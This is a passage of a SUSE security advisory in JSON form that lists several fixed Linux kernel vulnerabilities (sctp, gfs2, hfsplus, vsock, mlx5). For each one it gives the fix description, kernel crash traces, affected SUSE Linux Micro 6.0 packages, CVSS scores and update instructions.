"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsctp: avoid NULL dereference when chunk data buffer is missing\n\nchunk-\u003eskb pointer is dereferenced in the if-block where it\u0027s supposed\nto be NULL only.\n\nchunk-\u003eskb can only be NULL if chunk-\u003ehead_skb is not. Check for frag_list\ninstead and do it just before replacing chunk-\u003eskb. We\u0027re sure that\notherwise chunk-\u003eskb is non-NULL because of outer if() condition.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40240",
"url": "https://www.suse.com/security/cve/CVE-2025-40240"
},
{
"category": "external",
"summary": "SUSE Bug 1254869 for CVE-2025-40240",
"url": "https://bugzilla.suse.com/1254869"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40240"
},
{
"cve": "CVE-2025-40242",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40242"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ngfs2: Fix unlikely race in gdlm_put_lock\n\nIn gdlm_put_lock(), there is a small window of time in which the\nDFL_UNMOUNT flag has been set but the lockspace hasn\u0027t been released,\nyet. In that window, dlm may still call gdlm_ast() and gdlm_bast().\nTo prevent it from dereferencing freed glock objects, only free the\nglock if the lockspace has actually been released.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40242",
"url": "https://www.suse.com/security/cve/CVE-2025-40242"
},
{
"category": "external",
"summary": "SUSE Bug 1255075 for CVE-2025-40242",
"url": "https://bugzilla.suse.com/1255075"
},
{
"category": "external",
"summary": "SUSE Bug 1255076 for CVE-2025-40242",
"url": "https://bugzilla.suse.com/1255076"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "important"
}
],
"title": "CVE-2025-40242"
},
{
"cve": "CVE-2025-40244",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40244"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nhfsplus: fix KMSAN uninit-value issue in __hfsplus_ext_cache_extent()\n\nThe syzbot reported issue in __hfsplus_ext_cache_extent():\n\n[ 70.194323][ T9350] BUG: KMSAN: uninit-value in __hfsplus_ext_cache_extent+0x7d0/0x990\n[ 70.195022][ T9350] __hfsplus_ext_cache_extent+0x7d0/0x990\n[ 70.195530][ T9350] hfsplus_file_extend+0x74f/0x1cf0\n[ 70.195998][ T9350] hfsplus_get_block+0xe16/0x17b0\n[ 70.196458][ T9350] __block_write_begin_int+0x962/0x2ce0\n[ 70.196959][ T9350] cont_write_begin+0x1000/0x1950\n[ 70.197416][ T9350] hfsplus_write_begin+0x85/0x130\n[ 70.197873][ T9350] generic_perform_write+0x3e8/0x1060\n[ 70.198374][ T9350] __generic_file_write_iter+0x215/0x460\n[ 70.198892][ T9350] generic_file_write_iter+0x109/0x5e0\n[ 70.199393][ T9350] vfs_write+0xb0f/0x14e0\n[ 70.199771][ T9350] ksys_write+0x23e/0x490\n[ 70.200149][ T9350] __x64_sys_write+0x97/0xf0\n[ 70.200570][ T9350] x64_sys_call+0x3015/0x3cf0\n[ 70.201065][ T9350] do_syscall_64+0xd9/0x1d0\n[ 70.201506][ T9350] entry_SYSCALL_64_after_hwframe+0x77/0x7f\n[ 70.202054][ T9350]\n[ 70.202279][ T9350] Uninit was created at:\n[ 70.202693][ T9350] __kmalloc_noprof+0x621/0xf80\n[ 70.203149][ T9350] hfsplus_find_init+0x8d/0x1d0\n[ 70.203602][ T9350] hfsplus_file_extend+0x6ca/0x1cf0\n[ 70.204087][ T9350] hfsplus_get_block+0xe16/0x17b0\n[ 70.204561][ T9350] __block_write_begin_int+0x962/0x2ce0\n[ 70.205074][ T9350] cont_write_begin+0x1000/0x1950\n[ 70.205547][ T9350] hfsplus_write_begin+0x85/0x130\n[ 70.206017][ T9350] generic_perform_write+0x3e8/0x1060\n[ 70.206519][ T9350] __generic_file_write_iter+0x215/0x460\n[ 70.207042][ T9350] generic_file_write_iter+0x109/0x5e0\n[ 70.207552][ T9350] vfs_write+0xb0f/0x14e0\n[ 70.207961][ T9350] ksys_write+0x23e/0x490\n[ 70.208375][ T9350] __x64_sys_write+0x97/0xf0\n[ 70.208810][ T9350] x64_sys_call+0x3015/0x3cf0\n[ 70.209255][ T9350] do_syscall_64+0xd9/0x1d0\n[ 70.209680][ T9350] entry_SYSCALL_64_after_hwframe+0x77/0x7f\n[ 70.210230][ T9350]\n[ 70.210454][ T9350] CPU: 2 UID: 0 PID: 9350 Comm: repro Not tainted 6.12.0-rc5 #5\n[ 70.211174][ T9350] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\n[ 70.212115][ T9350] =====================================================\n[ 70.212734][ T9350] Disabling lock debugging due to kernel taint\n[ 70.213284][ T9350] Kernel panic - not syncing: kmsan.panic set ...\n[ 70.213858][ T9350] CPU: 2 UID: 0 PID: 9350 Comm: repro Tainted: G B 6.12.0-rc5 #5\n[ 70.214679][ T9350] Tainted: [B]=BAD_PAGE\n[ 70.215057][ T9350] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\n[ 70.215999][ T9350] Call Trace:\n[ 70.216309][ T9350] \u003cTASK\u003e\n[ 70.216585][ T9350] dump_stack_lvl+0x1fd/0x2b0\n[ 70.217025][ T9350] dump_stack+0x1e/0x30\n[ 70.217421][ T9350] panic+0x502/0xca0\n[ 70.217803][ T9350] ? kmsan_get_metadata+0x13e/0x1c0\n\n[ 70.218294][ Message fromT sy9350] kmsan_report+0x296/slogd@syzkaller 0x2aat Aug 18 22:11:058 ...\n kernel\n:[ 70.213284][ T9350] Kernel panic - not syncing: kmsan.panic [ 70.220179][ T9350] ? kmsan_get_metadata+0x13e/0x1c0\nset ...\n[ 70.221254][ T9350] ? __msan_warning+0x96/0x120\n[ 70.222066][ T9350] ? __hfsplus_ext_cache_extent+0x7d0/0x990\n[ 70.223023][ T9350] ? hfsplus_file_extend+0x74f/0x1cf0\n[ 70.224120][ T9350] ? hfsplus_get_block+0xe16/0x17b0\n[ 70.224946][ T9350] ? __block_write_begin_int+0x962/0x2ce0\n[ 70.225756][ T9350] ? cont_write_begin+0x1000/0x1950\n[ 70.226337][ T9350] ? hfsplus_write_begin+0x85/0x130\n[ 70.226852][ T9350] ? generic_perform_write+0x3e8/0x1060\n[ 70.227405][ T9350] ? __generic_file_write_iter+0x215/0x460\n[ 70.227979][ T9350] ? generic_file_write_iter+0x109/0x5e0\n[ 70.228540][ T9350] ? vfs_write+0xb0f/0x14e0\n[ 70.228997][ T9350] ? ksys_write+0x23e/0x490\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40244",
"url": "https://www.suse.com/security/cve/CVE-2025-40244"
},
{
"category": "external",
"summary": "SUSE Bug 1255033 for CVE-2025-40244",
"url": "https://bugzilla.suse.com/1255033"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40244"
},
{
"cve": "CVE-2025-40248",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40248"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvsock: Ignore signal/timeout on connect() if already established\n\nDuring connect(), acting on a signal/timeout by disconnecting an already\nestablished socket leads to several issues:\n\n1. connect() invoking vsock_transport_cancel_pkt() -\u003e\n virtio_transport_purge_skbs() may race with sendmsg() invoking\n virtio_transport_get_credit(). This results in a permanently elevated\n `vvs-\u003ebytes_unsent`. Which, in turn, confuses the SOCK_LINGER handling.\n\n2. connect() resetting a connected socket\u0027s state may race with socket\n being placed in a sockmap. A disconnected socket remaining in a sockmap\n breaks sockmap\u0027s assumptions. And gives rise to WARNs.\n\n3. connect() transitioning SS_CONNECTED -\u003e SS_UNCONNECTED allows for a\n transport change/drop after TCP_ESTABLISHED. Which poses a problem for\n any simultaneous sendmsg() or connect() and may result in a\n use-after-free/null-ptr-deref.\n\nDo not disconnect socket on signal/timeout. Keep the logic for unconnected\nsockets: they don\u0027t linger, can\u0027t be placed in a sockmap, are rejected by\nsendmsg().\n\n[1]: https://lore.kernel.org/netdev/e07fd95c-9a38-4eea-9638-133e38c2ec9b@rbox.co/\n[2]: https://lore.kernel.org/netdev/20250317-vsock-trans-signal-race-v4-0-fc8837f3f1d4@rbox.co/\n[3]: https://lore.kernel.org/netdev/60f1b7db-3099-4f6a-875e-af9f6ef194f6@rbox.co/",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40248",
"url": "https://www.suse.com/security/cve/CVE-2025-40248"
},
{
"category": "external",
"summary": "SUSE Bug 1254864 for CVE-2025-40248",
"url": "https://bugzilla.suse.com/1254864"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40248"
},
{
"cve": "CVE-2025-40250",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40250"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: Clean up only new IRQ glue on request_irq() failure\n\nThe mlx5_irq_alloc() function can inadvertently free the entire rmap\nand end up in a crash[1] when the other threads tries to access this,\nwhen request_irq() fails due to exhausted IRQ vectors. This commit\nmodifies the cleanup to remove only the specific IRQ mapping that was\njust added.\n\nThis prevents removal of other valid mappings and ensures precise\ncleanup of the failed IRQ allocation\u0027s associated glue object.\n\nNote: This error is observed when both fwctl and rds configs are enabled.\n\n[1]\nmlx5_core 0000:05:00.0: Successfully registered panic handler for port 1\nmlx5_core 0000:05:00.0: mlx5_irq_alloc:293:(pid 66740): Failed to\nrequest irq. err = -28\ninfiniband mlx5_0: mlx5_ib_test_wc:290:(pid 66740): Error -28 while\ntrying to test write-combining support\nmlx5_core 0000:05:00.0: Successfully unregistered panic handler for port 1\nmlx5_core 0000:06:00.0: Successfully registered panic handler for port 1\nmlx5_core 0000:06:00.0: mlx5_irq_alloc:293:(pid 66740): Failed to\nrequest irq. err = -28\ninfiniband mlx5_0: mlx5_ib_test_wc:290:(pid 66740): Error -28 while\ntrying to test write-combining support\nmlx5_core 0000:06:00.0: Successfully unregistered panic handler for port 1\nmlx5_core 0000:03:00.0: mlx5_irq_alloc:293:(pid 28895): Failed to\nrequest irq. err = -28\nmlx5_core 0000:05:00.0: mlx5_irq_alloc:293:(pid 28895): Failed to\nrequest irq. err = -28\ngeneral protection fault, probably for non-canonical address\n0xe277a58fde16f291: 0000 [#1] SMP NOPTI\n\nRIP: 0010:free_irq_cpu_rmap+0x23/0x7d\nCall Trace:\n \u003cTASK\u003e\n ? show_trace_log_lvl+0x1d6/0x2f9\n ? show_trace_log_lvl+0x1d6/0x2f9\n ? mlx5_irq_alloc.cold+0x5d/0xf3 [mlx5_core]\n ? __die_body.cold+0x8/0xa\n ? die_addr+0x39/0x53\n ? exc_general_protection+0x1c4/0x3e9\n ? dev_vprintk_emit+0x5f/0x90\n ? asm_exc_general_protection+0x22/0x27\n ? free_irq_cpu_rmap+0x23/0x7d\n mlx5_irq_alloc.cold+0x5d/0xf3 [mlx5_core]\n irq_pool_request_vector+0x7d/0x90 [mlx5_core]\n mlx5_irq_request+0x2e/0xe0 [mlx5_core]\n mlx5_irq_request_vector+0xad/0xf7 [mlx5_core]\n comp_irq_request_pci+0x64/0xf0 [mlx5_core]\n create_comp_eq+0x71/0x385 [mlx5_core]\n ? mlx5e_open_xdpsq+0x11c/0x230 [mlx5_core]\n mlx5_comp_eqn_get+0x72/0x90 [mlx5_core]\n ? xas_load+0x8/0x91\n mlx5_comp_irqn_get+0x40/0x90 [mlx5_core]\n mlx5e_open_channel+0x7d/0x3c7 [mlx5_core]\n mlx5e_open_channels+0xad/0x250 [mlx5_core]\n mlx5e_open_locked+0x3e/0x110 [mlx5_core]\n mlx5e_open+0x23/0x70 [mlx5_core]\n __dev_open+0xf1/0x1a5\n __dev_change_flags+0x1e1/0x249\n dev_change_flags+0x21/0x5c\n do_setlink+0x28b/0xcc4\n ? __nla_parse+0x22/0x3d\n ? inet6_validate_link_af+0x6b/0x108\n ? cpumask_next+0x1f/0x35\n ? __snmp6_fill_stats64.constprop.0+0x66/0x107\n ? __nla_validate_parse+0x48/0x1e6\n __rtnl_newlink+0x5ff/0xa57\n ? kmem_cache_alloc_trace+0x164/0x2ce\n rtnl_newlink+0x44/0x6e\n rtnetlink_rcv_msg+0x2bb/0x362\n ? __netlink_sendskb+0x4c/0x6c\n ? netlink_unicast+0x28f/0x2ce\n ? rtnl_calcit.isra.0+0x150/0x146\n netlink_rcv_skb+0x5f/0x112\n netlink_unicast+0x213/0x2ce\n netlink_sendmsg+0x24f/0x4d9\n __sock_sendmsg+0x65/0x6a\n ____sys_sendmsg+0x28f/0x2c9\n ? import_iovec+0x17/0x2b\n ___sys_sendmsg+0x97/0xe0\n __sys_sendmsg+0x81/0xd8\n do_syscall_64+0x35/0x87\n entry_SYSCALL_64_after_hwframe+0x6e/0x0\nRIP: 0033:0x7fc328603727\nCode: c3 66 90 41 54 41 89 d4 55 48 89 f5 53 89 fb 48 83 ec 10 e8 0b ed\nff ff 44 89 e2 48 89 ee 89 df 41 89 c0 b8 2e 00 00 00 0f 05 \u003c48\u003e 3d 00\nf0 ff ff 77 35 44 89 c7 48 89 44 24 08 e8 44 ed ff ff 48\nRSP: 002b:00007ffe8eb3f1a0 EFLAGS: 00000293 ORIG_RAX: 000000000000002e\nRAX: ffffffffffffffda RBX: 000000000000000d RCX: 00007fc328603727\nRDX: 0000000000000000 RSI: 00007ffe8eb3f1f0 RDI: 000000000000000d\nRBP: 00007ffe8eb3f1f0 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000293 R12: 0000000000000000\nR13: 00000000000\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40250",
"url": "https://www.suse.com/security/cve/CVE-2025-40250"
},
{
"category": "external",
"summary": "SUSE Bug 1254854 for CVE-2025-40250",
"url": "https://bugzilla.suse.com/1254854"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
